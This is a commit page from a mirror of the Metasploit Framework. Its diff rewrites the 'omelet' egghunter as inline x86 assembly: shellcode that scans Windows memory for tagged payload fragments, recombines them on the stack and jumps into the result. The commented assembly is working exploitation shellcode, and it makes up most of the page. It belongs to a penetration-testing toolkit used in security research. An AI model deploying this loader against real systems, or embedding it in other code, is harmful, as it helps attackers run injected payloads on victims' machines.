infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

another omelet update from Peter, this time with in-line assembly 

git-svn-id: file:///home/svn/framework3/trunk@10118 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2010-08-23 21:03:00 +00:00
parent bd96c10cc0
commit b6577681c6
2 changed files with 106 additions and 50 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
lib/msf/core/exploit/omelet.rb
View File

@ -40,7 +40,7 @@ module Exploit::Omelet
larch = larch[0] if (larch.kind_of?(Array)) larch = larch[0] if (larch.kind_of?(Array))
if los.nil? if los.nil?
raise RuntimeError, "No platform restrictions were specified -- cannot select egghunter" raise RuntimeError, "No platform restrictions were specified -- cannot select omelet hunter"
end end
omelet = Rex::Exploitation::Omelet.new(los, larch) omelet = Rex::Exploitation::Omelet.new(los, larch)

154
lib/rex/exploitation/omelet.rb
View File

@ -1,5 +1,7 @@
require 'rex/text' require 'rex/text'
require 'rex/arch' require 'rex/arch'
require 'metasm'
module Rex module Rex
module Exploitation module Exploitation
@ -89,66 +91,120 @@ class Omelet
nr_eggs = nr_eggs+1 nr_eggs = nr_eggs+1
end end
nr_eggs_hex = "%02x" % nr_eggs
eggsize_hex = "%02x" % eggsize
hextag = ""
eggtag.split('').each do | thischar |
decchar = "%02x" % thischar[0]
hextag = decchar + hextag
end
hextag = hextag + "01"
# create omelet code # create omelet code
the_omelet = "\xeb\x24" + omelet_hunter = <<EOS
"\x54\x5f" +
"\x66\x81\xcf\xff\xff" +
"\x89\xfa" +
"\x31\xc0" +
"\xb0" + nr_eggs.chr +
"\x31\xf6" +
"\x66\xbe" + (237-eggsize).chr + "\xff" +
"\x4f\x46" +
"\x66\x81\xfe\xff\xff" +
"\x75\xf7" +
"\x48" +
"\x75\xee" +
"\x31\xdb" +
"\xb3" + (nr_eggs+1).chr +
"\xc3" +
"\xe8\xd7\xff\xff\xff" +
"\xeb\x04" +
"\x4a\x4a\x4a\x4a" +
"\x42" +
"\x52" +
"\x6a\x02" +
"\x58" +
"\xcd\x2e" +
"\x3c\x05" +
"\x5a" +
"\x74\xf4" +
"\xb8\x01" + eggtag +
"\x01\xd8" +
"\x87\xfa" +
"\xaf" +
"\x87\xfa" +
"\x75\xe2" +
"\x89\xd6" +
"\x31\xc9" +
"\xb1" + eggsize.chr +
"\xf3\xa4" +
"\x4b" +
"\x80\xfb\x01" +
"\x75\xd4" +
"\xe8\xa4\xff\xff\xff" +
"\xff\xe7"
nr_eggs equ 0x#{nr_eggs_hex} ; number of eggs
egg_size equ 0x#{eggsize_hex} ; nr bytes of payload per egg
hex_tag equ 0x#{hextag} ; tag
jmp start
; routine to calculate the target location
; for writing recombined shellcode (omelet)
; I'll use EDI as target location
; First, I'll make EDI point to end of stack
; and I'll put the number of shellcode eggs in eax
get_target_loc:
push esp ; get stack pointer and put it in EDI
pop edi ; set EDI to end of stack
or di,0xffff ; edi=0x....ffff = end of current stack frame
mov edx,edi ; use edx as start location for the search
xor eax,eax ; zero eax
mov al,nr_eggs ; put number of eggs in eax
calc_target_loc:
xor esi,esi ; use esi as counter to step back
mov si,0-(egg_size+20) ; add 20 bytes of extra space, per egg
get_target_loc_loop: ; start loop
dec edi ; step back
inc esi ; and update ESI counter
cmp si,-1 ; continue to step back until ESI = -1
jnz get_target_loc_loop
dec eax ; loop again if we did not take all pieces
; into account yet
jnz calc_target_loc
; edi now contains target location
; for recombined shellcode
xor ebx,ebx ; put loop counter in ebx
mov bl,nr_eggs+1
ret
start:
call get_target_loc ; jump to routine which will calculate shellcode dst address
; start looking for eggs, using edx as basepointer
jmp search_next_address
find_egg:
dec edx ; scasd does edx+4, so dec edx 4 times
; + inc edx one time
; to make sure we don't miss any pointers
dec edx
dec edx
dec edx
search_next_address:
inc edx ; next ptr
push edx ; save edx
push 0x02
pop eax ; set eax to 0x02
int 0x2e
cmp al,0x5 ; address readable ?
pop edx ; restore edx
je search_next_address ; if addressss is not readable, go to next address
mov eax,hex_tag ; if address is readable, prepare tag in eax
add eax,ebx ; add offset (ebx contains egg counter, remember ?)
xchg edi,edx ; switch edx/edi
scasd ; edi points to the tag ?
xchg edi,edx ; switch edx/edi back
jnz find_egg ; if tag was not found, go to next address
;found the tag at edx
copy_egg:
; ecx must first be set to egg_size (used by rep instruction) and esi as source
mov esi,edx ; set ESI = EDX (needed for rep instruction)
xor ecx,ecx
mov cl,egg_size ; set copy counter
rep movsb ; copy egg from ESI to EDI
dec ebx ; decrement egg
cmp bl,1 ; found all eggs ?
jnz find_egg ; no = look for next egg
; done - all eggs have been found and copied
done:
call get_target_loc ; re-calculate location where recombined shellcode is placed
jmp edi ; and jump to it :)
EOS
the_omelet = Metasm::Shellcode.assemble(Metasm::Ia32.new, omelet_hunter).encode_string
# create the eggs array # create the eggs array
eggs = Array.new(nr_eggs) eggs = Array.new(nr_eggs)
total_size = eggsize * nr_eggs total_size = eggsize * nr_eggs
padlen = total_size - payloadlen padlen = total_size - payloadlen
#print("Padlen : #{padlen}") payloadpadding = "A" * padlen
payloadpadding = ""
if padlen > 0 fullcode = payload + payloadpadding
payloadpadding = "A" * padlen eggcnt = nr_eggs + 2
end
fullcode = payload+payloadpadding
eggcnt = nr_eggs+2
startcode = 0 startcode = 0
arraycnt = 0 arraycnt = 0
while eggcnt > 2 do while eggcnt > 2 do
egg_prep = eggcnt.chr + eggtag egg_prep = eggcnt.chr + eggtag
this_egg = fullcode[startcode, eggsize] this_egg = fullcode[startcode, eggsize]